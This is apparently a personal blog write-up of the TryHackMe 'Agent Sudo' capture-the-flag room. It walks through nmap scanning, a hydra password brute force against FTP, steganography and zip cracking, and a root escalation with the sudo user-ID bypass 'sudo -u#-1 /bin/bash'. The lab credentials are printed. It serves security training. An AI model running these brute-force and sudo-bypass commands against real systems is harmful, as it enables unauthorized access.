Posts Agent Sudo
Post
Cancel

Agent Sudo

Description:

The Following Post is writeup of Agent Sudo room of tryhackme https://tryhackme.com/room/agentsudoctf

MachineDetails
OSlinux
RatingEasy
CreatorDesKel

Summary:

PortScan will give you 3 open ports 21,22 and 80. When we go to port 80 we can see a message to change useragent we changed it to C and boom landed upon secret page. From here we logged into ftp and extracted some files. Zip Crack and Steganography all the way. Now we have another username and password. Now sudo exploit.

Walkthrough:

Enumeration

Lets start with nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
└──╼ $nmap -sC -sV -A -T4 10.10.144.201 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 10:22 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating Ping Scan at 10:22
Scanning 10.10.144.201 [2 ports]
Completed Ping Scan at 10:22, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:22
Completed Parallel DNS resolution of 1 host. at 10:22, 0.10s elapsed
Initiating Connect Scan at 10:22
Scanning 10.10.144.201 [1000 ports]
Discovered open port 21/tcp on 10.10.144.201
Discovered open port 80/tcp on 10.10.144.201
Discovered open port 22/tcp on 10.10.144.201
Increasing send delay for 10.10.144.201 from 0 to 5 due to 47 out of 117 dropped probes since last increase.
Completed Connect Scan at 10:22, 14.29s elapsed (1000 total ports)
Initiating Service scan at 10:22
Scanning 3 services on 10.10.144.201
Completed Service scan at 10:22, 6.46s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.144.201.
Initiating NSE at 10:22
Completed NSE at 10:22, 7.03s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.96s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Nmap scan report for 10.10.144.201
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.66 seconds

Start our enum for port 80

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

try user agent C

Secret Page

Attention chris,

o you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R

So indeed the password is weak let’s brute force ssh or ftp

I tried both but got success in vsftpd

1
2
3
4
5
6
7
8
9
10
└──╼ $hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.144.201
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-02 10:28:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.144.201:21/
[21][ftp] host: 10.10.144.201   login: chris   password: <redacted>
[STATUS] 14344399.00 tries/min, 14344399 tries in 00:01h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-02 10:30:02
1
2
3
4
5
Let's check files

-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png

cat To_agentJ.txt

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn’t be a problem for you.

From, Agent C

Another message
Let’s check for Steganography

Binwalk

1
2
3
4
5
6
7
8
└──╼ $binwalk cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

Use john to crack the zip pass then we will get a Message

Agent C,

We need to send the picture to ‘QXJ…..’ as soon as possible!

By, Agent R

Hmmmm interesting let’s check where we can put this password I pretty much stuck but after a thought i got it

1
2
└──╼ $base64 -d rand.txt
<redacted>

hahha worked and got message.txt

Hi james,

Glad you find this message. Your login password is hackerrules!

Don’t ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy chris

For real i stuck a bit here and ran exploit suggester but got nothing Then I feel noob when i ran this and my mind sudenly hit

1
2
3
4
5
6
7
james@agent-sudo:/tmp$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

Yup sudo exploit

1
2
james@agent-sudo:/tmp$ sudo -u#-1 /bin/bash
root@agent-sudo:/tmp#

Damn Good Rooted

To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

Your flag is

>By, a.k.a Agent R
This post is licensed under CC BY 4.0 by the author.